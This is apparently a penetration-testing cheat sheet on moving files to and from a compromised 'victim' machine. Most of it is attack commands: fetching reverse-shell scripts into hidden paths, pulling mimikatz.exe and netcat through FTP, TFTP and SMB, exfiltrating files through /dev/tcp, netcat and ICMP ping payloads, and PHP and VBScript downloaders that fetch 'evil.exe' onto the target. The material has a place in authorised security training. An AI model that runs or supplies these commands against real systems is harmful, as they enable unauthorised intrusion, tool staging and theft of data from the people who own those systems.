Contents
- Introduction
- Copy and Paste Base64
- HTTP
- HTTPS Server
- FTP
- SMB
- SCP
- NC
- /dev/tcp
- ICMP
- SMTP
- TFTP
- PHP
- VBScript
- Debug.exe
- DNS
Introduction
Note: This article is work in progress.
You will probably need to extract some data from the victim or even introduce something (like privilege escalation scripts). In this section you can find about common tools that you can use with these purposes.
Copy and Paste Base64
Linux:
base64 -w0 <file> # Encode file base64 -d file # Decode file
Windows:
certutil -encode payload.dll payload.b64 certutil -decode payload.b64 payload.dll
HTTP
Linux:
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py fetch 10.10.14.14:8000/shell.py # FreeBSD
Windows:
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf # PS (New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe") Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe" wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe" Import-Module BitsTransfer Start-BitsTransfer -Source $url -Destination $output # OR Start-BitsTransfer -Source $url -Destination $output -Asynchronous
HTTPS Server
# from https://gist.github.com/dergachev/7028596 # taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/ # generate server.xml with the following command: # openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes # run as follows: # python simple-https-server.py # then in your browser, visit: # https://localhost:443 # PYTHON2 import BaseHTTPServer, SimpleHTTPServer import ssl httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler) httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True) httpd.serve_forever() # # PYTHON3 from http.server import HTTPServer, BaseHTTPRequestHandler import ssl httpd = HTTPServer(('0.0.0.0', 443), BaseHTTPRequestHandler) httpd.socket = ssl.wrap_socket(httpd.socket, certfile="./server.pem", server_side=True) httpd.serve_forever() # # USING FLASK from flask import Flask, redirect, request from urllib.parse import quote app = Flask(__name__) @app.route('/') def root(): print(request.get_json()) return "OK" if __name__ == "__main__": app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443) #
FTP
FTP server (python):
pip3 install pyftpdlib python3 -m pyftpdlib -p 21
FTP server (node.js):
sudo npm install -g ftp-srv --save ftp-srv ftp://0.0.0.0:9876 --root /tmp
FTP server (pure-ftp):
#!/bin/bash apt-get update && apt-get install pure-ftp groupadd ftpgroup useradd -g ftpgroup -d /dev/null -s /etc ftpuser pure-pwd useradd fusr -u ftpuser -d /ftphome pure-pw mkdb cd /etc/pure-ftpd/auth/ ln -s ../conf/PureDB 60pdb mkdir -p /ftphome chown -R ftpuser:ftpgroup /ftphome/ /etc/init.d/pure-ftpd restart
Windows client:
# Works well with python. With pure-ftp use fusr:ftp echo open 10.11.0.41 21 > ftp.txt echo USER anonymous >> ftp.txt echo anonymous >> ftp.txt echo bin >> ftp.txt echo GET mimikatz.exe >> ftp.txt echo bye >> ftp.txt ftp -n -v -s:ftp.txt
SMB
Kali as server:
kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory kali_op2> smbserver.py -smb2support name /path/folder # Share a folder #For new Win10 versions impacket-smbserver -smb2support -user test -password test test `pwd`
Or create a **smb **share using samba:
apt-get install samba mkdir /tmp/smb chmod 777 /tmp/smb #Add to the end of /etc/samba/smb.conf this: [public] comment = Samba on Ubuntu path = /tmp/smb read only = no browsable = yes guest ok = Yes #Start samba service smbd restart
Windows:
CMD-Wind> \\10.10.14.14\path\to\exe CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali" WindPS-2> cd new_disk:
SCP
The attacker has to have SSHd running:
scp <username>@<Attacker_IP>:<directory>/<filename>
NC
nc -lvnp 4444 > new_file nc -vn <IP> 4444 < exfil_file
/dev/tcp
Download file from victim:
nc -lvnp 80 > file #Inside attacker cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim
Upload file to victim:
nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker # Inside victim exec 6< /dev/tcp/10.10.10.10/4444 cat <&6 > file.txt
ICMP
In order to exfiltrate the content of a file via pings you can do:
# This will 4bytes per ping packet (you could probably increase this until 16) xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done
This is ippsec receiver created in the HTB machine Mischief:
from scapy.all import * def process_packet(pkt): if pkt.haslayer(ICMP): if pkt[ICMP].type == 0: data = pkt[ICMP].load[-4:] #Read the 4bytes interesting print(f"{data.decode('utf-8')}", flush=True, end="") sniff(iface="tun0", prn=process_packet)
SMTP
If you can send data to an SMTP server, you can create a SMTP to receive the data with python:
sudo python -m smtpd -n -c DebuggingServer :25
TFTP
By default in XP and 2003 (in others it need to be explicitly added during installation).
In Kali, start TFTP server:
#I didn't get this options working and I prefer the python option mkdir /tftp atftpd --daemon --port 69 /tftp cp /path/tp/nc.exe /tftp
TFTP server in python:
pip install ptftpd ptftpd -p 69 tap0 . # ptftp -p <PORT> <IFACE> <FOLDER>
In victim, connect to the Kali server:
tftp -i <KALI-IP> get nc.exe
PHP
Download a file with a PHP oneliner:
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
VBScript
Attacker:
python -m SimpleHTTPServer 80
Victim:
echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs echo Err.Clear >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs echo If http Is Nothing Then Set http =CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs echo http.Open "GET", strURL, False >> wget.vbs echo http.Send >> wget.vbs echo varByteArray = http.ResponseBody >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs echo strData = "" >> wget.vbs echo strBuffer = "" >> wget.vbs echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs echo Next >> wget.vbs echo ts.Close >> wget.vbs
cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
Debug.exe
This is a crazy technique that works on Windows 32 bit machines. Basically the idea is to use the debug.exe
program. It is used to inspect binaries, like a debugger. But it can also rebuild them from hex. So the idea is that we take a binaries, like netcat
. And then disassemble it into hex, paste it into a file on the compromised machine, and then assemble it with debug.exe
.
debug.exe
can only assemble 64 kb. So we need to use files smaller than that. We can use upx to compress it even more. So let's do that:
upx -9 nc.exe
Now it only weights 29 kb. Perfect. So now let's disassemble it:
wine exe2bat.exe nc.exe nc.txt
Now we just copy-paste the text into our windows-shell. And it will automatically create a file called nc.exe
.